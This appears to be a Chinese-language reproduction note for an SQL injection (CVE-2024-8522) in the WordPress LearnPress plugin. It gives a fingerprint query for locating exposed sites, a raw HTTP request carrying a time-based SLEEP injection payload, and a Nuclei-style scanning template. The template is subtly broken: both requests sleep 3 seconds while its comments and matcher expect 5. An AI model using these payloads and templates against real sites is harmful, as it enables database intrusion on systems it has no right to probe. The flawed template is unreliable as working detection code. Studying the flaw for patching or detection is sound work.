WordPress LearnPress插件存在SQL注入漏洞(CVE-2024-8522)
<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>
<font style="color:rgb(38, 38, 38);">wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。WordPress LearnPress插件存在SQL注入漏洞(CVE-2024-8522)</font>
<font style="color:rgb(38, 38, 38);">二、影响版本</font>
- <font style="color:rgb(38, 38, 38);">WordPress LearnPress插件</font>
<font style="color:rgb(38, 38, 38);">三、资产测绘</font>
body="/wp-content/plugins/learnpress"
四、漏洞复现
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(5)),0) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
id: WordPress-sqli
info:
name: WordPress-sqli
author: HAOGUOGUO #作者
severity: critical #风险等级
description: WordPress SQL注入漏洞
http:
- raw:
- | #这里的GET为请求体1,请求2的延时设置为3
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(3)),0) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
- | #这里的GET为请求体2,请求2的延时设置为5
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(3)),0) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
matchers:
- type: dsl
dsl:
- 'duration_1>=3 && duration_1<=4' #请求1的延时>=3且<=4
- 'duration_2>=5 && duration_2<=6' #请求2的延时>=5且<=6